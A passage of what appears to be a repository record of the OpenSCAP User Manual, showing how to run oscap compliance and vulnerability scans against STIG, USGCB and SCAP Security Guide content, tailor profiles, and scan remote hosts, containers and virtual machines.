\\\n--cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \\\nU_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 6*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content for represents Tier IV Checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n------------------------------------------------------------------------------\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n------------------------------------------------------------------------------\n\n2) Unpack the USGCB content.\n--------------------------------------\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n--------------------------------------\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval \\\n--profile united_states_government_configuration_baseline \\\n--cpe usgcb-rhel5desktop-cpe-dictionary.xml \\\n--oval-results \\\n--fetch-remote-resources \\\n--results results.xml \\\nusgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nAdditional reports can be generated from detailed OVAL result files.\nScanner outputs OVAL results files in the current directory, for each\nOVAL file on input there is one output. In case of USGCB, there is\none OVAL file distributed along the XCCDF, another one which is\ndownloaded from Red Hat Repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in runing evaluation of the USGCB on a remote machine using\na GUI please see:\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. For example, as per 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLikewise the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Examplary evaluation of DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval \\\n--profile DOD_baseline_1.0.0.1 \\\n--cpe dcb-rhel5_cpe-dictionary.xml \\\n--results result.xml \\\n--oval-results \\\ndcb-rhel5_xccdf.xml\n----\n\n* Examplary evaluation of Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval \\\n--profile MAC-2_Public \\\n--cpe U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \\\n--results result.xml \\\n--oval-results \\\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command line option. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of the OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6 or 7\nGuidances for Red Hat Enterprise Linux 6 and 7 can be acquired from\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG holds currently the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as open collaboration of U.S. Government\nbodies to develop next generation of United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n=== How to check that patches are up-to-date on Red Hat Enterprise Linux 6 or 7\nThis section describes how to check that software patches are up-to-date using\nexternal OVAL content.\n\n1) Install the SSG\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2a) Evaluate common profile for RHEL 6\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources \\\n--results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\n2b) Evaluate common profile for RHEL 7\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources \\\n--results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThis command evaluates common profile for Red Hat Enterprise Linux 6 or 7. Part of\nthe profile is a rule to check that patches are up-to-date. To evaluate the rule\ncorrectly, oscap tool needs to download an up-to-date OVAL file from Red Hat servers. This can be\nallowed using *--fetch-remote-resources* option. Result of this scan will be saved\nin **results.xml** using ARF format.\n\n\n\n=== How to tailor Source data stream\nThis section describes tailoring of content using Tailoring file. This allows\nyou to change behavior of content without its direct modification.\n\n1) Obtain tailoring file\n\nTailoring file can be easily generated using {workbench_url}[SCAP Workbench].\n\n2) List profiles of tailoring file\n\n----\n$ oscap info ssg-rhel6-ds-tailoring.xml\nDocument type: XCCDF Tailoring\nImported: 2016-08-31T11:08:16\nBenchmark Hint: \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\nProfiles:\n\txccdf_org.ssgproject.content_profile_C2S_customized\n----\n\n3) Evaluate\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_C2S_customized \\\n--tailoring-file ssg-rhel6-ds-tailoring.xml \\\n--results results.xml\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nThe command above evaluates tailored data stream by **ssg-rhel6-ds-tailoring.xml** tailoring file.\nXCCDF results can be found in **results.xml** file.\n\nInstead of external tailoring file, you can also use tailoring component integrated to data stream.\n\n----\n$ oscap info simple-ds.xml\n\nDocument type: Source Data Stream\nImported: 2016-02-02T14:06:14\n\nStream: scap_org.open-scap_datastream_from_xccdf_simple-xccdf.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_simple-xccdf.xml\n\t\tStatus: incomplete\n\t\tResolved: false\n\t\tProfiles:\n\t\t\txccdf_org.open-scap_profile_override\n\t\tReferenced check files:\n\t\t\tsimple-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n\tRef-Id: scap_org.open-scap_cref_simple-tailoring.xml\n\t\tBenchmark Hint: (null)\n\t\tProfiles:\n\t\t\txccdf_org.open-scap_profile_default\n\t\t\txccdf_org.open-scap_profile_unselecting\n\t\t\txccdf_org.open-scap_profile_override\nChecks:\n\tRef-Id: scap_org.open-scap_cref_simple-oval.xml\nNo dictionaries.\n----\n\nTo choose tailoring component \"scap_org.open-scap_cref_simple-tailoring.xml\", the command below can be used.\n\n----\n$ oscap xccdf eval \\\n--tailoring-id scap_org.open-scap_cref_simple-tailoring.xml \\\n--profile xccdf_org.open-scap_profile_default \\\n--results results.xml simple-ds.xml\n----\n\nThe command above evaluates content using tailoring component *scap_org.open-scap_cref_simple-tailoring.xml* from source data stream.\nScan results are stored in *results.xml* file.\n\n\n=== Evaluation of content\nSpecified XCCDF or data stream content can contain zero or more profiles.\n\nScan can be evaluated without specific profile, otherwise profile can be selected using\n*--profile* option.\n\n----\n$ oscap xccdf eval --results results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nThe command above evaluates rules without specific profile. XCCDF results are stored in *results.xml* file.\n\n\n== Other utilities\n\nApart from the `oscap` command, OpenSCAP provides also other utilities for\nspecial purposes. Those utilities use `oscap` under the hood, but they\nenable users to perform advanced tasks in a single command.\nThis manual gives a quick overview of and shows basic usage of these tools.\nEach of the tools have its own manual page that gives more detailed information.\n\n=== Scanning remote machines using oscap-ssh\n\nThe `oscap-ssh` is a simple tool for scanning remote machines with OpenSCAP\nover network and collecting results.\n\nThe tool uses SSH connection to copy the SCAP content to a remote machine, then\nit runs an evaluation of the target system and downloads the results back.\nThe remote machine needs to have OpenSCAP installed.\n\nThe tool can evaluate source DataStreams and OVAL files.\nUsage of the tool mimics usage and options of `oscap` tool.\n\nIn the following example, we will scan a remote Fedora server located on IP address\n*192.168.1.13* that listens for SSH connections on port *22*.\nThe server will be scanned for compliance with the *Common Profile for General-Purpose\nFedora Systems* provided by SCAP Security Guide.\nHTML report is written out as *report.html* on the local machine.\n\n----\n$ oscap-ssh root@192.168.1.13 22 xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--report report.html \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-fedora-ds.xml\n----\n\n=== Scanning of Docker containers and images using oscap-docker\n\nThe `oscap-docker` is used to scan Docker containers and images. It can\nassess vulnerabilities in the container or image and check their compliance\nwith security policies. Usage of the tool mimics usage and options\nof `oscap` tool.\n\nThe `oscap-docker` tool uses a technique called offline scanning.\nThat means that the filesystem of the container is mounted to a directory\non the host. The mounted filesystem is read-only. OpenSCAP then assess\nthe container from the host. Therefore no agent is installed\nin the container and container is not touched or changed in any way.\n\nHowever, `oscap-docker` requires http:\/\/www.projectatomic.io\/[Atomic]\ninstalled on the host. Atomic is advanced container management solution and\nit enables `oscap-docker` to access the containers.\n\nIn the first example, we will perform a vulnerability assessment\nof an Docker image of Red Hat Enterprise Linux 7 (named *rhel7*). The command\nwill attach docker image, determine OS variant\/version, download CVE stream\napplicable to the given image and finally it will evaluate the image\nfor vulnerabilities. CVE stream is a list of vulnerabilities in SCAP format\nand is downloaded directly from Red Hat.\nHTML report is written out as *report.html* on the local machine.\n\n----\n$ oscap-docker image-cve rhel7 --report report.html\n----\n\nIn the second example, we will check the same *rhel7* image for\ncompliance with a security policy specified in an XCCDF checklist.\n\n----\n$ oscap-docker image rhel7 xccdf eval --report report.html xccdf.xml\n----\n\nTo scan running containers, commands are very similar, just replace\n\"image-cve\" with \"container-cve\" and \"image\" with \"container\".\n\n=== Scanning of virtual machines using oscap-vm\n\nOpenSCAP provides a simple tool to evaluate virtual machines called `oscap-vm`.\n\nThe tool can scan given virtual machine directly from the virtualisation host.\nUsage of the tool mimics usage and options of `oscap` tool.\n\nSimilarly to `oscap-docker`, this utility also uses offline scanning,\nso it doesn't install anything in the guest, doesn't require OpenSCAP\ninstalled in the guest and it doesn't create or change anything in the\nguest's filesystem.\n\n=== Scanning arbitrary filesystems using oscap-chroot\n\nA very simple script `oscap-chroot` can be used to perform\nan offline scan of a filesystem that is mounted at arbitrary path.\nIt can be used for scanning of custom objects that are not supported\nby `oscap-docker` or `oscap-vm`, like containers in other\nformats than Docker.\nAgain, usage of the tool mimics usage and options of `oscap` tool.\n\n\n\n== Frequently Asked Questions (FAQs)\n*Why do I get \"notchecked\" results when I use e.g. https:\/\/dl.dod.cyber.mil\/wp-content\/uploads\/stigs\/zip\/U_Red_Hat_Enterprise_Linux_7_V2R3_STIG.zip[STIG checklist]?*\n\nThe downloaded guidance contains rule descriptions, but it doesn't contain OVAL checks which could be used for evaluation by OpenSCAP. You can find guidances with implemented OVAL checks and also with remediations at https:\/\/github.com\/ComplianceAsCode\/content[ComplianceAsCode] project, which contains wide range of profiles.\n\n*I try to apply a tailoring file, but OpenSCAP still evaluates rules that I have unselected. How can I enforce my changes of the profile?*\n\nMake sure that you provide the ID of the customized profile in `--profile` option instead of the ID of the original profile.\nIf you created the tailoring file using SCAP Workbench, you were prompted to choose the ID of the customized profile. You can display the ID of the customized profile by running `oscap info <your_tailoring_file>`. By default, the ID of the customized profile ends with `_customized` suffix.\n","old_contents":"= OpenSCAP User Manual\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n `oscap` and its most common operations. With `oscap` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n `oscap` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The `oscap` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe `oscap` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the {ssg}[SCAP Security Guide] project to provide us the SCAP\ncontent. It provides security policies written in a form of SCAP documents\ncovering many areas of computer security, and it implements security guidances\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool to do the customization.\n\nThe Basic oscap usage section of the manual presents how to install the tool\nand SCAP content and how to use those to examine a SCAP content, perform a\nconfiguration scan or how to automatically remediate your machines.\n\nThird section provides cover advanced topic like validation, signing and\ntransformation of SCAP content, generating reports and guides and also some\ninformation about CPE applicability.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (`oscap` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the `oscap` tool from\n{oscap_git}[source] (for details please refer to the <<..\/developer\/developer.adoc#,Developer Documentation>>),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----------------------------\n# yum install openscap-scanner\n----------------------------\n\nNOTE: If the `openscap-scanner` is not available install\n `openscap-utils` instead.\n\nBefore you can start using the `oscap` tool you must have some SCAP content\non your system. You can download it from the respective web site but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----------------------------\n# yum install scap-security-guide\n----------------------------\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, `oscap` can\nprocess the content by specifying the file path to the content. The `oscap`\nsupports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----------\n$ oscap -V\n----------\n\n=== Displaying Information about SCAP Content\nOne of the capabilities of `oscap` is to display information about the SCAP\ncontents within a file. Running the `oscap info` command allows the\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (**Generated**) and the date the document was copied to\nfile system (**Imported**). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams.\n\nThe following example demonstrates usage and sample output of the\ncommand when target is SCAP data stream:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDocument type: Source Data Stream\nImported: 2016-08-10T20:49:16\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n Status: draft\n Generated: 2016-08-10\n Resolved: true\n Profiles:\n xccdf_org.ssgproject.content_profile_standard\n xccdf_org.ssgproject.content_profile_pci-dss\n xccdf_org.ssgproject.content_profile_C2S\n xccdf_org.ssgproject.content_profile_rht-ccp\n xccdf_org.ssgproject.content_profile_common\n xccdf_org.ssgproject.content_profile_stig-rhel7-workstation-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-gui-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n xccdf_org.ssgproject.content_profile_ospp-rhel7-server\n xccdf_org.ssgproject.content_profile_nist-cl-il-al\n xccdf_org.ssgproject.content_profile_cjis-rhel7-server\n Referenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-ocil.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\nand when XCCDF document is examined:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2016-08-10T20:49:16\nStatus: draft\nGenerated: 2016-08-10\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n----\n\n**Document type** describes what format the file is in. Common types include\nXCCDF, OVAL, Source Data Stream and Result Data Stream.\n\n**Checklist version** is the XCCDF version only shown for XCCDF files. Common\nvalues are 1.1 and 1.2.\n\n**Imported** is the date the file was imported for use with OpenSCAP. Since\nOpenSCAP uses the local filesystem and has no proprietary database format\nthe imported date is the same as file modification date.\n\n**Status** is the XCCDF Benchmark status. Common values include \"accepted\",\n\"draft\", \"deprecated\" and \"incomplete\". Please refer to the XCCDF specification\nfor details. This is only shown for XCCDF files.\n\n**Generated** date is the date the file was created \/ generated. This date\nis shown for XCCDF files and Checklists and is sourced from the XCCDF **Status**\nelement.\n\n**Checklists** lists available checklists incorporated in the Data Stream that\nyou can use for the `--benchmark-id` command line attribute with `oscap xccdf\neval`. Also each checklist has the detailed information printed.\n\n**Profiles** lists available profile IDs that you can use for the `--profile`\ncommand line attribute with `oscap xccdf eval`.\n\n==== More Information about Result Files (XCCDF and ARF)\n\n`oscap info` is less helpful with XCCDF results and ARF files. Two important\ndates that are commonly requested are the evaluation start and end dates.\n\nTo look them up in the XCCDF result file, open the file and look for the\nTestResult element. The **start-time** and **end-time** attributes contain the evaluation\ntimes and dates.\n\n----\n<TestResult id=\"xccdf_org.open-scap_testresult_common\"\n start-time=\"2017-01-21T19:16:28\" end-time=\"2017-01-21T19:17:35\">\n----\n\nTo look up the dates in ARF file open the file and again look for the TestResult\nelements. The elements will be located in the arf:report elements.\n\n----\n<arf:reports>\n <arf:report id=\"xccdf1\">\n <arf:content>\n <TestResult xmlns=\"http:\/\/checklists.nist.gov\/xccdf\/1.2\"\n id=\"xccdf_org.open-scap_testresult_xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\"\n start-time=\"2017-01-20T14:30:18\" end-time=\"2017-01-20T14:36:32\">\n----\n\nYou can also find both dates in a HTML report, table **Evaluation\ncharacteristics**. To generate HTML report from XCCDF result or ARF, use\n`oscap xccdf generate report` command.\n\n=== Scanning with OSCAP\nThe main goal of the `oscap` tool is to perform configuration and\nvulnerability scans of a local system. Oscap is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or SCAP Data Stream), or as multiple\nseparate XML files. The following examples distinguish between these\napproaches.\n\n==== OVAL\nThe SCAP document can have a form of a single OVAL file (an OVAL\nDefinition file). The `oscap` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to standard output\nstream. The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----------------------------------------------------------\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----------------------------------------------------------\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----------------------------------------------------------------------------------\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----------------------------------------------------------------------------------\nWhere the OVAL definition being evaluated is defined by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream collection, run the\nfollowing command:\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables has to be exported to a special file that is used during the\nOVAL definitions evaluation. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables \\\n--profile united_states_government_configuration_baseline \\\nusgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval \\\n--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \\\n--results usgcb-results-oval.xml\nusgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the the OVAL Result file.\n\nAn OVAL directives file can be used to control whether results should be \"thin\" or \"full\".\nThis file can be loaded by OpenSCAP using *--directives <file>* option.\n\nExample of an OVAL directive file which enables thin results instead of\nfull results:\n\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<oval_directives\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:oval=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-common-5\"\n xmlns:oval-res=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-results-5\"\n xmlns=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-directives-5\"\n xsi:schemaLocation=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-results-5\n oval-results-schema.xsd http:\/\/oval.mitre.org\/XMLSchema\/oval-common-5\n oval-common-schema.xsd http:\/\/oval.mitre.org\/XMLSchema\/oval-directives-5\n oval-directives-schema.xsd\">\n <generator>\n <oval:product_name>OpenSCAP<\/oval:product_name>\n <!-- make sure the OVAL version matches your input -->\n <oval:schema_version>5.8<\/oval:schema_version>\n <oval:timestamp>2017-02-04T00:00:00<\/oval:timestamp>\n <\/generator>\n <directives include_source_definitions=\"true\">\n <oval-res:definition_true reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_false reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_unknown reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_error reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_not_evaluated reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_not_applicable reported=\"true\" content=\"thin\"\/>\n <\/directives>\n<\/oval_directives>\n----\n\nIf your use-case requires thin OVAL results you most likely also want\nto omit system characteristics. You can use the *--without-syschar*\noption to that effect.\n\nUsage of OVAL directives file when scanning a plain OVAL file:\n\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --directives directives.xml --without-syschar --results oval-results.xml oval.xml\n---------------------------------------------------------------------------------------------------\n\nUsage of OVAL directives file when scanning OVAL component from a Source DataStream:\n\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --directives directives.xml --without-syschar --datastream-id ds.xml --oval-id oval.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\n\nIt is not always clear which OVAL file will be used when multiple files\nare distributed. In case you are evaluating an XCCDF file you can use:\n\n---------------------------------------------------------------------------------------------------\n$ oscap info ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2017-01-20T14:20:43\nStatus: draft\nGenerated: 2017-01-19\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n stig-rhevh-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\n docker-host\n nist-800-171-cui\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n---------------------------------------------------------------------------------------------------\n\nIn the output you can see all referenced check files. In this case we see\nthat `ssg-rhel7-oval.xml` is referenced. To see contents of this file you\ncan open it in a text editor.\n\nYou can use `oscap info` with Source DataStream files as well. Source\nDataStream will often reference OVAL files that are bundled in it.\nIt is also possible to extract OVAL files from Source DataStream through `oscap ds sds-split`.\n\n---------------------------------------------------------------------------------------------------\n$ oscap ds sds-split ssg-rhel7-ds.xml extracted\/\n$ ls -1 extracted\/\nscap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\nscap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\nssg-rhel7-cpe-oval.xml\nssg-rhel7-ocil.xml\nssg-rhel7-oval.xml\n---------------------------------------------------------------------------------------------------\n\nAfter splitting the Source DataStream you can inspect OVAL and XCCDF 